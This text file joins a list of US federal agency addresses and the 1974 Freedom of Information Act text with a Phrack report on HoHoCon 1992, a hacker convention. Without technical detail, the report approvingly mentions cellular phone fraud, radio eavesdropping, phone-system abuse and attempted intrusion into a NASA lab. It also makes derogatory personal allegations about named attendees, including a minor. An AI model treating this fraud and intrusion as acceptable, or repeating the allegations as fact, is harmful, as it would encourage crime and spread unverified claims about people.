-
- FAA
- Federal Aviations Administration
- 800 Independence Avenue, S.W.
- Washington, D.C. 20591
-
- FBI
- Federal Bureau of Investigation
- 9th and Pennsylvania Avenue, N.W.
- Washington, D.C. 20535
-
- FCC
- Federal Communications Commission
- 1919 M Street, N.W.
- Washington, D.C. 20554
-
- Federal Elections
- Federal Election Commission
- 550 17th Street, N.W.
- Washington, D.C. 20463
-
- Federal Highways
- Federal Highway Administration
- 400 7th Street, S.W.
- Washington, D.C. 20590
-
- Federal Power
- Federal Power Commission
- 825 North Capitol Street
- Washington, D.C. 20426
-
- Federal Trade
- Federal Trade Commission
- 6th and Pennsylvania Avenue, N.W.
- Washington, D.C. 20580
-
- Food and Drug
- Food and Drug Administration
- 5600 Fisher Lane
- Rockville, Maryland 20857
-
- Foreign Claims Settlement
- Foreign Claims Settlement Commission
- 1111 20th Street, N.W.
- Washington, D.C. 20579
-
- General Accounting
- General Accounting Office
- 441 G. Street, N.W.
- Washington, D.C. 20548
-
- General Services
- General Services Administration
- 18th and F Streets, N.W.
- Washington, D.C. 20405
-
- Health, Education, and Welfare
- U.S. Department of Health, Education, and Welfare
- 200 Independence Avenue, S.W.
- Washington, D.C. 20201
-
- Health Resources
- Health Resources Administration
- 3700 East West Highway
- Hyattsville Maryland 20782
-
- Health Services
- Health Services Administration
- 5600 Fisher Lane
- Rockville, Maryland 20857
-
- HUD
- Department of Housing and Urban Development
- Washington, D.C. 20410
-
- Immigration and Naturalization
- Immigration and Naturalization Service
- 425 I Street, N.W.
- Washington, D.C. 20536
-
- Information Agency
- U.S. Information Agency
- 1750 Pennsylvania Avenue, N.W.
- Washington, D.C. 20547
-
- Interior
- Department of the Interior
- 18th and C Street, N.W.
- Washington, D.C. 20240
-
- IRS
- Internal Revenue Service
- 1111 Constitution Avenue, N.W.
- Washington, D.C. 20224
-
- International Development
- Agency for International Development
- 21st and Virginia Avenue, N.W.
- Washington, D.C. 20532
-
- International Trade
- International Trade Commission
- 701 E Street, N.W.
- Washington, D.C. 20436
-
- ICC
- Interstate Commerce Commission
- 12th and Constitutional Avenue, N.W.
- Washington, D.C. 20423
-
- Justice
- Department of Justice
- Washington, D.C. 20530
-
- Labor
- Department of Labor
- Washington, D.C. 20210
-
- Law Enforcement Assistance
- Law Enforcement Assistance Administration
- 633 Indiana Avenue, N.W.
- Washington, D.C. 20230
-
- National Aeronautics and Space
- National Aeronautics and Space Administration
- 400 Maryland Avenue, S.W.
- Washington, D.C. 20546
-
- National Archives and Records
- National Archives and Records Service
- Washington, D.C. 20408
-
- National Credit Union
- National Credit Union Administration
- 2025 M Street, N.W.
- Washington, D.C. 20506
-
- National Endowment for the Arts
- National Endowment for the Arts
- 806 15th Street, N.W.
- Washington, D.C. 20506
-
- National Endowment for Humanities
- National Endowment for Humanities
- 806 15th Street, N.W.
- Washington, D.C. 20506
-
- National Highway Traffic Safety
- National Highway Traffic Safety Administration
- 400 7th Street, S.W.
- Washington, D.C. 20590
-
- National Institute of Education
- National Institute of Education
- 1200-19th Street, N.W.
- Washington, D.C. 20208
-
- National Institute of Health
- National Institute of Health
- 9000 Rockville Pike
- Rockville, Maryland 20014
-
- National Labor Relations
- National Labor Relations Board
- 1717 Pennsylvania Avenue, N.W.
- Washington, D.C. 20570
-
- National Science Foundation
- National Science Foundation
- 1800 G Street, N.W.
- Washington, D.C. 20550
-
- National Security Agency
- National Security Agency
- Fort George Meade, Maryland 20755
-
- National Security Council
- National Security Council
- Old Executive Office Building
- Washington, D.C. 20506
-
- National Transportation Safety
- National Transportation Safety Board
- 800 Independence Avenue, S.W.
- Washington, D.C. 20594
-
- Navy
- Department of the Navy
- The Pentagon
- Washington, D.C. 20350
-
- Nuclear Regulation
- Nuclear Regulatory Commission
- Washington, D.C. 20555
-
-
-
- Overseas Private Investment
- Overseas Private Investment Corporation
- 1129 20th Street, N.W.
- Washington, D.C. 20527
-
- Postal Service
- U.S. Postal Service
- 475 L'Enfant Plaza, S.W.
- Washington, D.C. 20260
-
- Prisons
- Bureau of Prisons
- 320 First Street, N.W.
- Washington, D.C. 20534
-
- Public Health
- Public Health Service
- 200 Independence Avenue, S.W.
- Washington, D.C. 20201
-
- Secret Service
- U.S. Secret Service
- 1800 G Street, N.W.
- Washington, D.C. 20223
-
- Securities and Exchange
- Securities and Exchange Commission
- 500 North Capitol Street
- Washington, D.C. 20435
-
- Selective Service
- Selective Service System
- 600 E Street, N.W.
- Washington, D.C. 20435
-
- Small Business
- Small Business Administration
- 1441 L Street, N.W.
- Washington, D.C. 20416
-
- Social Security
- Social Security Administration
- 6401 Security Blvd.
- Baltimore, Maryland 21235
-
- State
- Department of State
- Washington, D.C. 20520
-
- Transportation
- Department of Transportation
- 400 7th Street, S.W.
- Washington, D.C. 20590
-
- Treasury
- Department of the Treasury
- 1500 Pennsylvania Avenue, N.W.
- Washington, D.C. 20220
-
- Urban Mass Transit
- Urban Mass Transit Administration
- 400 7th Avenue, S.W.
- Washington, D.C. 20590
-
- Veterans
- Administration
- Vermont Avenue, N.W.
- Washington, D.C. 20420
-
- Here is a copy of the Freedom of Information Act and all of its
- amendments. It may prove to have some usefulness. You might want to read
- through it to understand the law better. I would not recommend reading it if
- you are in a suicidal state.
-
- ------------------------------------------------------------------------------
-
- FULL TEXT OF FREEDOM OF INFORMATION ACT,
- AS AMENDED IN 1974 BY PUBLIC LAW 93-502
-
-
- % 552 Public Information; agency rules, opinions, orders, records, and
- proceedings
- (a) Each agency shall make available to the public information as follows:
- (1) Each agency shall separately state and currently publish in the Federal
- Register for the guidance of the public-
- (A) descriptions of its central and field organization and the
- established places at which, the employees (and in the case of a
- uniformed service, the members) from whom, and the method whereby, the
- public may obtain information, make submittals or requests, or obtain
- decisions;
- (B) statements of the general course and method by which its functions
- are channeled and determined, including the nature and requirements of
- all formal and informal procedures available;
- (C) rules of procedures, descriptions of forms available or the places
- at which forms may be obtained, and instructions as to the scope and
- contents of all papers, reports, or examinations;
- (D) substantive rules of general applicability adopted as authorized by
- law, and statements of general policy or interpretations of general
- applicability formulated and adopted by the agency; and
- (E) each amendment, revision, or repeal of the foregoing.
-
- Except to the extent that a person has actual and timely notice of the terms
- thereof, a person may not in any manner be required to resort to, or be
- adversely affected by, a matter required to be published in the Federal
- Register and not so published. For the purpose of this paragraph matter
- reasonably available to the class of persons affected thereby is deemed
- published in the Federal Register when incorporated by reference therein with
- the approval of the Director of the Federal Register.
- (2) Each agency, in accordance with published rules, shall make available
- for public inspection and copying-
- (A) final opinions, including concurring and dissenting opinions, as
- well as orders, made in the adjudication of cases;
- (B) those statements of policy and interpretations which have been
- adopted by the agency and are not published in the Federal Register; and
- (C) administrative staff manuals and instructions to staff that affect
- a member of the public;
-
- unless the materials are promptly published and copies offered for sale. To
- the extent required to prevent a clearly unwarranted invasion of personal
- privacy, an agency may delete identifying details when it makes available or
- publishes an opinion, statement of policy, interpretation, or staff manual or
- instruction. However, inn each case the justification for the deletion shall
- be explained clearly in writing. Each agency shall also maintain and make
- available for public inspection and copying current indexes providing
- identifying information for the public as to any matter issued, adopted, or
- promulgated after July 4, 1967, and required by this paragraph to be made
- available or published. Each agency shall promptly, quarterly or more
- frequently, and distribute (by sale or otherwise) copies of each index or
- supplement thereto unless it determines by order published in the Federal
- Register that the publication would be unnecessary and impracticable, in which
- case the agency shall nonetheless provide copies of such index on request at a
- cost not to exceed the direct cost of duplication. A final order, opinion,
- statement of policy, interpretation, or staff manual or instruction that
- affects a member of the public may be relied on, used, or cited as precedent
- by an agency against a party other than an agency only if-
- (i) it has been indexed and either made available or published as
- provided by this paragraph; or
- (ii) the party has actual and timely notice of the terms thereof.
- (3) Except with respect to the records made available under paragraphs (1)
- and (2) of this subsection, each agency, upon any request for records which
- (A) reasonably describes such records and (B) is made in accordance with
- published rules stating the time, place, fees (if any), and procedures to be
- followed, shall make the records promptly available to any person.
- (4)(A) In order to carry out the provisions of this section, each agency
- shall promulgate regulations, pursuant to notice and receipt of public
- comment, specifying a uniform schedule of fees applicable to all constituent
- units of such agency. Such fees shall be limited to reasonable standard
- charges for documents search and duplication and provide for recovery of only
- the direct costs of such search and duplication. Documents shall be furnished
- without charge or at a reduced charge where the agency determines that waiver
- or reduction of the fee is in the public interest because furnishing the
- information can be considered as primarily benefiting the general public.
- (B) On complaint, the district court of the United States in the district
- in which the complainant resides, or has his principal place of business,
- or in which the agency records are situated, or in the District of
- Columbia, has jurisdiction to enjoin the agency from withholding agency
- records and to order the production of any agency records improperly
- withheld from the complainant. In such a case the court shall determine
- the matter de novo, and may examine the contents of such agency records in
- camera to determine whether such records or any part thereof shall be
- withheld under any of the exemptions set forth in subsection (b) of this
- section, and the burden is on the agency to sustain its action.
- (C) Notwithstanding any other provision of law, the defendant shall serve
- an answer or otherwise plead to any complaint made under the
- subsection within thirty days after service upon the defendant of the
- pleading i which such complaint is made, unless the court otherwise
- directs for good cause shown.
- (D) Except as to cases the court considers of greater importance,
- proceedings before the district court, as authorized by this
- subsection, and appeals therefrom, take precedence on the docket over
- all cases and shall be assigned for hearing and trial or for argument
- at the earliest practicable date and expedited in every way.
- (E) The court may assess against the United States reasonable attorney
- fees and other litigation costs reasonably incurred in any case under
- this section in which the complainant has substantially prevailed.
- (F) Whenever the court orders the production of any agency records
- improperly withheld from the complainant and assesses against the
- United States reasonable attorney fees and other litigation costs,
- and the court additionally issues a written finding that the
- circumstances surrounding the withholding raise we questions whether
- agency personnel acted arbitrarily or capriciously with respect to
- the withholding, the Civil Service Commission shall promptly initiate
- a proceeding to determine whether disciplinary action is warranted
- against the officer or employee who was primarily responsible for the
- withholding. The Commission, after investigation and consideration of
- the evidence submitted, shall submit its findings and recommendations
- to the administrative authority of the agency concerned and shall
- send copies of the findings and recommendations to the officer or
- employee or his representative. The administrative authority shall
- take the corrective action that the Commission recommends.
- (G) In the event of noncompliance with the order of the court, the
- district court may punish for contempt the responsible employee, and
- in the case of a uniformed service, the responsible member.
- (5) Each agency having more than one members shall maintain and make
- available for public inspection a record of the final votes of each member in
- every agency proceeding.
- (6)(A) Each agency, upon any request for records made under paragraph
- (1),(2), or (3) of the subsection, shall-
- (i) determine within ten days (except Saturdays, Sundays, and legal
- public holidays) after the receipt of any such request whether to comply
- with such request and shall immediately notify the person making such
- request of such determination and the reasons therefor, and of the right
- of such person to appeal to the head of the agency and adverse
- determination; and
- (ii) make a determination with respect to any appeal within twenty days
- (excepting Saturdays, Sundays, and legal public holidays) after the
- receipt of such appeal. If on appeal the denial of the request for
- records is in whole or in part upheld, the agency shall notify the person
- making such request of the provisions for judicial review of that
- determination under paragraph (4) of this subsection.
- (B) In unusual circumstances as specified in this subparagraph, the time
- limits prescribed in either clause (i) or clause (ii) of subparagraph (A)
- may be extended by written notice to the person making such request setting
- forth the reasons for such extension and the date on which a determination
- is expected to be dispatched. NO such notice shall specify a date that
- would result in an extension for more than ten working days. As used in
- this subparagraph, "unusual circumstances" means, but only to the extent
- reasonably necessary to the proper processing of the particular request-
- (i) the need to search for and collect the requested records from field
- facilities or other establishments that are separate from the office
- processing the request;
- (ii) the need to search for, collect, and appropriately examine a
- voluminous amount of separate and distinct records which are demanded in
- a single request; or
- (iii) the need for consultation, which shall be conducted with all
- practicable speed, with another agency having a substantial interest in
- the determination of the request or among two or more components of the
- agency having substantial subject-matter interest therein.
- (C) Any person making a request to any agency for records under paragraph
- (1), (2), or (3) of this subsection shall be deemed to have exhausted his
- administrative remedies with respect to such request if the agency fails
- comply with the applicable time limit provisions of this paragraph. If the
- Government can show exceptional circumstances exist and that the agency is
- exercising due diligence in responding to the request, the court may retain
- jurisdiction and allow the agency addition time to complete its review of
- the record. Upon any determination by an agency to comply with a request
- for records, the records shall be made promptly available to such person
- making such request. Any notification of denial of any request for records
- under this subsection shall set forth the names and titles or positions of
- each person responsible for the denial of such request.
- (b) This section does not apply to matters that are-
- (1) (A) specifically authorized under criteria established by an Executive
- Order to be kept secret in the interest of national defense or foreign policy
- and (B) are in fact properly classified pursuant to each Executive Order;
- (2) related solely to the internal personnel rules and practices of the
- agency;
- (3) specifically exempted from disclosure by statute;
- (4) trade secrets and commercial or financial information obtained from a
- person and privileged or confidential;
- (5) inter-agency or intra-agency memorandums or letters which would not be
- available by law to a party other than an agency in litigation with the
- agency;
- (6) personnel and medical files and similar files the disclosure of which
- would constitute a clearly unwarranted invasion of personal privacy;
- (7) investigatory records compiled for law enforcement purposes, but only to
- the extent that the production of such records would (A) interfere with
- enforcement proceeding, (B) deprive a person of a right to a fair trial or an
- impartial adjudication, (C) constitute an unwarranted invasion of personal
- privacy, (D) disclose the identity of a confidential source and, in the case
- of a record compiled by a criminal law enforcement authority in the course of
- a criminal investigation, or by an agency conducting a lawful national
- security intelligence investigation, confidential information only furnished
- by the confidential source, (E) disclose investigative techniques and
- procedures, or (F) endanger the life or physical safety of law enforcement
- personnel;
- (8) contained in or related to examination, operating or condition reports
- prepared by, one behalf of, or for the use of an agency responsible for the
- regulation or supervision of financial institutions; or
- (9) geological and geophysical information and data, including maps,
- concerning wells.
-
- Any responsible segregable portion of a record shall be provided to any person
- requesting such record after deletion of the portions which are exempt under
- the subsection.
- (c) This section does not authorize withholding of information or limit the
- availability of records to the public, except as specifically stated in this
- section. This section is not authority to withhold information from Congress.
- (d) On or before March 1 of each calendar year each agency shall submit a
- report covering the preceding calendar year to the Speaker of the House of
- Representatives and President of the Senate for referral to the appropriate
- committees of Congress. The report shall include-
- (1) the number of determinations made by such agency not to comply with
- requests for records made to such agency under subsection (a) and the reasons
- for each determination;
- (2) the number of appeals made by persons under subsection (a)(6), the
- result of such appeals, and the reason for the action upon each appeal that
- results in a denial of information;
- (3) the names and titles or positions of each person responsible for the
- denial of records requested under this section, and the number of instances
- for participation of each;
- (4) the results of each proceeding conducted pursuant to subsection
- (a)(4)(F), including a report of the disciplinary action taken against the
- officer or employee who was primarily responsible for improperly withholding
- records or an explanation of why disciplinary action was not taken;
- (5) a copy of every rule made by such agency regarding this section;
- (6) a copy of the fee schedule and the total amount of fees collected by the
- agency for making records available under this section; and
- (7) such other information as indicates efforts to administer fully this
- section.
-
- The Attorney General shall submit an annual report on or before March 1 of
- each calendar year which shall include for the prior year a listing of the
- number of cases arising under this section, the exemption involved in each
- case, the disposition of such case, and the cost, fees, and penalties assessed
- under subsections (a)(4)(E),(F), and (G). Such report shall also include a
- description of the efforts undertaken by the Department of Justice to
- encourage agency compliance with this section.
- (e) for purposes of this section, the term "agency" is defined in section
- 551(1) of this title includes any executive department, military department,
- Government corporation, Government controlled corporation, or other
- establishment in the executive branch of the Government (including the
- Executive Office of the President), or any independent agency.
- ------------------------------------------------------------------------------
-
- In Conclusion:
-
- The Freedom of Information Act is a powerful tool that can be used to
- benefit yourself and to find out what the feds keep in their log books on you.
- Use it, just don't abuse it. It gives the individual much power over the
- government. We no longer have to prove a reason to know the information, but
- we have a right to know the information. Its the government's job to keep the
- information away from us. I would also like to mention that regulations and
- all documents that agencies carry can be found in any major library. This
- will save you cash and frustration. Anyways, keep the faith, its not that bad
- out there. And watch comedy central, its good for you.
-
- Greets to: All the good users on atdt, the works, tlitd. Stargazer, daemon,
- joker, shadow, the hopeless warez fanatics. Deranged derelict, jt, and all
- the other virtual friends I forgot.
-
- --------------------------------------------------------------------------------
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 13 of 14
-
- HoHoCon 1992
- Miscellany
-
-
-
-
- The hackers were getting nervous. It was understandable. Just a few weeks
- before HoHoCon and already two other "get-togethers" had experienced
- turbulence from the authorities.
-
- Rumors began to fly that HoHo was to be the next target. Messages bearing
- ill-tidings littered the underground. Everyone got worked into a frenzy about
- the upcoming busts at HoHoCon. People began to cancel their reservations
- while others merely refused to commit one way or the other.
-
- But, amidst all the confusion and hype, many declared "Let them try to
- raid us! I'm going anyway!" These were the few, the proud...the stupid.
-
- -------------------------------------------------------------------------------
-
- HoHoCon as I saw it - Erik Bloodaxe (Chris Goggans)
-
- I arrived at the Allen Park Inn in the mid afternoon on Friday the 18th.
- I was promptly greeted by several of my cohorts and a loping transient
- who introduced himself as "Crunchhhhhhhhh." Yes, John Draper, the infamous
- Captain Crunch had actually ventured outward to attend our little party.
- (Yes, Virginia, the rumors are true: The Captain is toothless, unkempt,
- overbearing and annoying as all hell.)
-
- I followed Scott Chasin back to our room, the pack of other early arrivals
- in close file behind. After storing my gear I noticed that Draper was
- looming in the doorway ranting furiously about all the smoking in our room.
- "I've never heard of a hacker who smoked," exclaimed the Captain.
- Taking this as my cue, I bummed a Djarum off of Crimson Death and took great
- glee in adding my fumes to the enveloping fog.
-
- Draper spent the next 30 minutes attempting to eavesdrop on various
- conversations in which various old friends were catching up. Not knowing
- any of us personally, he nonetheless felt obligated to offer his comments
- about our discussions about life and college and music amidst his coughing
- and complaining about the smoke.
-
- After some time everyone was banished from the room and several of us
- went out to eat. Scott Chasin, myself, two hackers (The Conflict, & Louis
- Cypher) along with Gary Poole (covering the entire mess for Unix World) took
- off for the nearest grease pit. Taco Bell won in proximity, and once
- surrounded by burritos Scott, Conflict and I began our rant about Unix
- Security (the lack thereof). Gary whipped out his Unix World pen and pad
- and began taking notes. I am uncertain whether or not it was the content
- of our spiel or the asides I repeatedly made regarding the bevy of giggling
- coeds that garnered the most notes in Gary's booklet.
-
- Back at the Con things were spicing up. More people had begun to arrive
- and the Allen Park Inn staff began to worry about their safety and that of
- their other guests. One remarked to Jesse (Drunkfux), the sponsor of HoHoCon, "That Draper
- fellow needs to stay out of the lobby. He was eating large
- amounts of flesh off his hands and it was scaring some of the visitors."
- The staff did not know what to think at all when a father arrived with his
- three sons and after purchasing a room on his credit card told the boys, "Ok
- guys, Mom will be picking you up on Sunday."
-
- This did not concern most of us. It was straight to the bar
- for us, where Rambone bought Scott & myself a round of Kamikazes. Also at
- the bar was Bootleg who had just gotten out. (Of what, and for what you
- can find out on your own.) Bootleg is probably the smartest biker I have
- ever had the pleasure to meet. We talked about sex, drugs, hawgs, computers,
- cellular fraud and how close the nearest cabaret was.
-
- A small controversy began to arise amidst the hackers at the bar. Stationed
- near one end of the room was a table lined with older men. "FEDS," someone
- murmured, gesturing at the group.
-
- "Good for them," I said, and left the bar to look for Jesse. When I returned
- several minutes later the hackers had engaged the strangers in conversation
- and found that they weren't feds after all. Among this group were
- Jim Carter of Houston-based Bank Security, and Bernie Milligan of
- Communications & Toll Fraud Specialists, Inc. Once this news was out
- tensions eased and everyone continued with their libations.
-
- Suddenly I became aware that there was girl in the room. I had seen her out
- in the courtyard previously but now she was alone. Turning on my
- "Leisure Suit Larry" charm I grabbed the seat next to her. Melissa had arrived
- from Austin to cover the event for Mondo-2000. She surprised me by telling
- me that she knew who I was, where I worked, and even knew my extension number.
- (I almost fell off the barstool.)
-
- Jim & Bernie came over and joined us at the bar. Bootleg, Chaoswiz, Melissa
- and I engaged them in wild stories about UFO's, hacking, the NSA & the CIA.
- (Bernie alleged that he was ex-NSA, and Jim ex-CIA. We have not yet
- determined if they were acting under orders from Col. Jim Beam & Gen. Jack
- Daniels.)
-
- After the ensuing debates on the true formation of the NSA, the group broke up
- and Melissa and I took off to MC Allah's room to partake of the keg he had
- brought. We walked in the room and were greeted with the sight of a four-foot
- boy with a syringe sticking out of his arm. This was a bit much, even for me.
- I snatched his "medication" away from him and found that it was really only
- some type of growth hormone. The boy, 8-Ball, was actually 15 and his parents
- had him on hormones to stimulate his growth. 8-Ball was totally whacked
- out his mind nonetheless. I think he had ingested such a diverse amount of
- God knows what by the time we arrived that he was lucky to remember where
- he was. Later that evening he would become convinced that he was Scott
- Chasin and confessed to quite a bit of wrongdoing just before he gave offerings
- at the porcelain alter.
-
- Conversations in the keg room left something to be desired. One large hacker
- named Tony looked at Melissa and in his best British accent asked if he
- could fondle her breasts. And the debate between MC Allah and Hunter about
- who could drink the most alcohol reached a climax when both stuck their heads
- under the keg spigot for extended periods of time.
-
- Sometime just before 11:00 the hotel guard, attired in Raiders jacket and
- a really, really big snow hat (the kind with the poofy ball on top) showed
- up brandishing his paper baton, (A rolled up Houston Press). "You all
- needs to get to yaw roomz, nah. I ain'tz ta gonna tell yaw no mo'."
- Everyone looked the guard over and moved back into the keg room. Thus was
- born, "Homie da Guard." After he wandered away, everyone moved back out
- onto the porch.
-
- It was getting late and I was supposed to speak the next morning so I tried to
- get into our room. Scott Chasin, hacker extrordinaire, had locked me out.
- After beating on the door for 10 minutes, the windows for 5, the walls for 10,
- and letting the phone ring for another 15 minutes I decided that Scott was a
- bit too tipsy to unlock the door so I crashed out on Jesse's floor.
-
- That night, the water pipes broke. There was some speculation that those
- evil hackers had "hacked the system." Not.
-
- While complaining about the lack of water that night, someone overheard
- three young attendees at a bank of pay phones attempting to order up
- a few escorts on "credit." Rumor has it they were successful.
-
- The next morning was chaos. By the time we arrived at the conference room
- there were about 150 people inside. Louis Cypher sat at the door collecting
- money for the raffle and getting everyone to sign the guest book. Jesse
- and others were setting up various video equipment and getting things
- in order. In the back of the room, Bernie sat scanning the crowd with a
- super-ear, recording the conversations of those sitting.
-
- Crunch was up in arms again. "If everyone in here doesn't stop smoking
- I won't be able to do my speech. If you all want to hear me talk, you
- will have to stop smoking." Several more cigarettes lit up. After
- speaking with management, Crunch came back in and asked if everyone smoking
- would at least move to one side of the auditorium nearest the door.
- With hesitation, the crowd conceded.
-
- The conference got underway with consultant Ray Kaplan taking a census of
- those in attendance. The group ranged from under 15 to over 50, had
- professionals and hobbyists, and had enthusiasts for every conceivable
- type operating system. Ray went on to elaborate on one of his audio
- conferences in which an FBI officer alluded that one of their key
- sources of information was "I.R.C."
-
- Bootleg got up and spoke on the vast potentials involved with cellular
- fraud. He discussed how to monitor the reverse channel to obtain ESNs,
- and where to obtain the equipment to allow you to do such a thing. He
- later handed out diskettes (IBM format) containing information on how
- to reprogram cellular phones and where to obtain the equipment necessary
- to pick subscriber numbers out of the air.
-
- Up next, myself and Chasin. Our topic was a bit obscure and cut deliberately
- short due to concerns about the nature of our speech. During the Dateline
- NBC piece that featured Chasin a piece of information flashed on the screen
- that alluded to UFO information stored on military computers. Chasin
- and I had gained possession of the research database compiled by the hackers
- who were looking into this. We discussed their project, the rumors surrounding
- their findings and the fear surrounding the project. Not knowing the true
- details of this we declined to comment any further, but made the documentation
- available to anyone who wanted a copy. We finished our speech by answering
- questions about Comsec, Consultants, etc.
-
- Steve Ryan, a Houston lawyer with a great deal of interest in the
- legal aspects of cyberspace spoke next. He covered several of the current
- issues affecting the community, spoke on laws in effect, cases pending,
- and gave an insight to his background that led him to focus in on
- the issues concerning the electronic community.
-
- Next, Jim Carter gave a quick and dirty demonstration of how to monitor
- electromagnetic radiation and how to do a simple data recovery from this
- noise. He monitored a small data terminal from a portable television set
- that was completely unmodified. He then spoke on how to read the
- EMR from such things as plumbing, the ground, off of window panes, etc.
- Jim's speech, although highly intriguing, got extremely vague at points,
- especially regarding technology needed, his own background, etc.
- (We will attribute this to his "CIA" training.)
-
- The Hotel Officials showed up and demanded that everyone get out immediately.
- Apparently someone had staggered into the kitchen, drunk, and broken
- something. Steve Ryan left to smooth things out a bit. After a few minutes
- he returned and told everyone that they could stay, but to keep it quiet
- tonight. Thus the secret plans of some to drive the hotel golf cart
- into the pool were crushed.
-
- The raffle proved to be an exercise in banality. Everything from
- flashing street lights to SunOS 4.1.3 to T-shirts to books were
- auctioned off. One lucky devil even got an official Michael Jackson
- candy bar.
-
- The folks from RDT (Count Zero and White Knight) handed out a large amount
- of photocopied goodies such as the new "Forbes" article on hackers,
- a complete set of the old 70's telephony 'zine "TEL" as well as assorted other
- flyers and pamphlets.
-
- Up next, Louis Cypher spoke about his entanglement with the law
- regarding his front-page bust for counterfeiting. He told of his
- experiences with the law, how they got involved in such a dastardly
- deed, what jail was like on the inside, and advice against anyone
- else considering such a thing.
-
- Up last, John Draper. Draper had managed by this time to annoy almost
- everyone at the convention. A large portion of those in attendance
- left as soon as he got up. They were the unlucky ones. Draper, for all his
- oddities, is an intriguing speaker. His life has been quite rich with
- excitement and when he can actually focus on a subject he is captivating.
- He spoke on his trip to the Soviet Union where he met computer and telephone
- enthusiasts in Moscow. He spoke on his unfortunate involvement with
- Bill SF and the BART Card duplication scandal. He spoke, with obvious
- longing, of the good old days of blue boxing, and stacking tandems to
- obtain local trunks, and on verification circuitry.
-
- Listening to Draper talk really brought me back to my beginnings. I could
- hear in my head the "cachink-chink" of a tandem waiting for MF. I remembered
- stacking tandems to Europe and back to call my other line. I remembered
- the thrill of finding never before known trunks and exploring their
- connections. I fell into a deep nostalgic high, and walked up to John
- to tell him thanks. As I extended my hand to him, he mumbled something
- unintelligible and wandered off. So much for paying respect.
-
- About ten of us took off to Chuy's for dinner: Me, Chasin, Conflict,
- Rambone, Dispater, Blue Adept, Minor Threat and reporters Joe Abernathy
- and Gary Poole were among the diners. Everyone ate heartily and listened
- to cordless telephone conversations on Rogue Agent's handheld scanner.
- One conversation was between what appeared to be a "pimp" talking to his
- "ho" about some money owed him by another in his flock. The conversation
- drifted to the Dallas man who had terrorized an entire neighborhood some
- months back with prank phone calls. Conflict and Dispater repeated a
- few of the choicest of the calls for our amusement.
-
- Back at the hotel, Dr. Hoffman's Problem Child had escaped, and several
- casualties were reported.
-
- Conflict, Chasin and I barricaded ourselves in our room and went on a lengthy
- stream of consciousness rant about what we needed out of life. Our absolute
- essentials were reduced to a small room with a computer hooked into the
- Internet, a specially designed contour chair, a small hole through which
- a secretary would give us food, virtual reality sex toys, and a toilet.
- (Chasin suggested no toilet, but a catheter so we would never have to move.)
- Gary Poole was quietly stunned in the corner of the room making mental notes.
-
- Much of the con had moved into a suite that had been converted into a
- mass computing arena. Several attendees from Pittsburgh had turned their
- room into a lab with four Unix workstations with several terminals throughout
- the room including the bathroom! These were hooked into the Internet through
- a slip connection that had been rigged somewhere. It was quite a site.
- The room was usually completely packed and smelled like a smoky gymnasium.
-
- (It was rumored that after Chasin and I spoke on the UFO conspiracy, several
- hackers began their attempts at penetrating the Ames Research Lab. No
- reports back on their success.)
-
- After I finished copying several Traci Lords video tapes (ahem) I relinquished
- control of the decks to a room downstairs. Dispater played a video
- manipulation he and Scott Simpson had produced. They had found a TRW training
- video tape during a trashing run and dubbed in their own dialogue. (You'd
- have to see it to fully understand.)
-
- After that, I played a few tapes of my own. The first was a short film called
- "Red," that chronicled the abusive prank phone calls directed at a bartender.
- The film had the actual phone call tapes played with video stills. (Guess
- where the Simpsons came up with that nifty idea...)
-
- Following "Red," someone heard on the scanner that the guard was answering
- a large noise disturbance in the room we were in. (Yes, they had the hotel
- guard's 2-meter frequencies.) Everyone moved into another room before the
- guard showed up. He was thoroughly confused.
-
- In the next room I played the ultimate in shock, the sequel to the movie that
- I had disturbed the entire con with last year, "Nekromantik II." I won't
- go into any detail, since the title says it all. Once again, I reign as
- the sickest person at HoHoCon, this honor bestowed upon me by everyone
- who witnessed the showing.
-
- As things winded down, several people ended up back in our room to waste
- away the last few hours of the night. Several people returned from an
- adventure to "an abandoned hospital." No one really understood what they went
- to, but it sounded disturbing. Later, that same group would leave to
- go climb "an abandoned grain storage tower." Go figure.
-
- Approximately 2:00 am, a local hacker named Zach showed up. Scott had a few
- words for Zach, as did most everyone at the Con. Zach lived in a fantasy
- land where he was a top notch security consultant with high paying clients
- in the telecommunications industry. He also like to name drop names like
- Chasin and Goggans as his partners and as people who would swoop down
- and terrorize the people he had any problems with. He also liked to turn
- in, or threaten to turn in any of his rivals in the software pirating
- community. He also like to proposition young boys both in person and
- over the phone. At 17, Zach had a few problems.
-
- Trapped in the corner of the room, Zach endured about an hour of questioning
- and accusations (all of which he truly deserved.) Eventually Zach left,
- apparently not affected by the ordeal at all. We attributed this to his
- overly apparent schizophrenia brought on by denial of his sexual
- tendencies.
-
- Later that night the Pittsburgh gang blew out the power in their entire
- wing. One was overheard, "Hmmm...guess we should have known that when the
- power strips kept melting that we were drawing too much power."
-
- The next morning everyone gathered up their gear and said so long. All but
- a few who gathered in a room marked "the suite of the elite." Armed with
- a nitrous oxide blaster, everyone sat around and viewed the con through
- the roaming video eye of Jesse, who had managed to capture everyone
- in some kind of compromising position. He will be selling them off
- after he edits it a bit. It was dubbed "The Blackmail Tape."
-
- In my opinion this year was much less anarchistic than last year. The
- convention might not even be banished from this hotel. (Yeah, right.)
- There were no raids, there were no overtly violent or satanic acts,
- no fire alarms, no trashing runs (that I saw), no fights,
- and there were no strippers (alas). The conference portion of the
- event was much better organized, there was much more interesting
- information to be shared, and was well worth the distances traveled by
- all.
-
- This was HoHoCon '92.
-
- --------------------------
-
- H*O*H*O*C*O*N '92
-
- Frosty's Itinerary
-
- Thursday 8pm Take off and go bar hopping all night long to build up
- stamina for the convention.
-
- Thrusday 10pm Quit bar hopping and waste shitloads of money at the
- casinos in feeble attempts to get gas money for the trip.
-
- Friday 5am Leave the casino and decide to get some sleep after spending
- hours to win a meager $10 over starting cash.
-
- Friday 8am Wake up and decide to pack for the trip. Forget necessities
- that we couldn't live without. Remember to bring junk food.
-
- Friday 9am Stuff assembled GCMS members into subcompact Japanese micro
- car and leech as much gas money out of them as possible.
-
- Friday 2pm Stop at the friendly convenient store to rob it of precious
- sugar-coated necessities and obtain mucho lotto tickets.
-
- Friday 4pm Endure Windrunner's gruelling multi-hour long verbatim
- rantings of taking the Purity Test 1500 verbally.
-
- Friday 7pm Pull out many maps and try to find the damn hotel in Houston.
-
- Friday 9pm Arrive at the hotel getting a room for one (car stuffed
- with people sits outside the lobby). Request two keys.
-
- Friday 10pm Test the smoke machine on the hotel grounds. Chase young
- code-kids out of your way, threatening to disable their
- phones.
-
- Friday 11pm Crash in room from lack of sleep. Kick other members out
- of your way. Ignore multiple alcoholic beverages lining
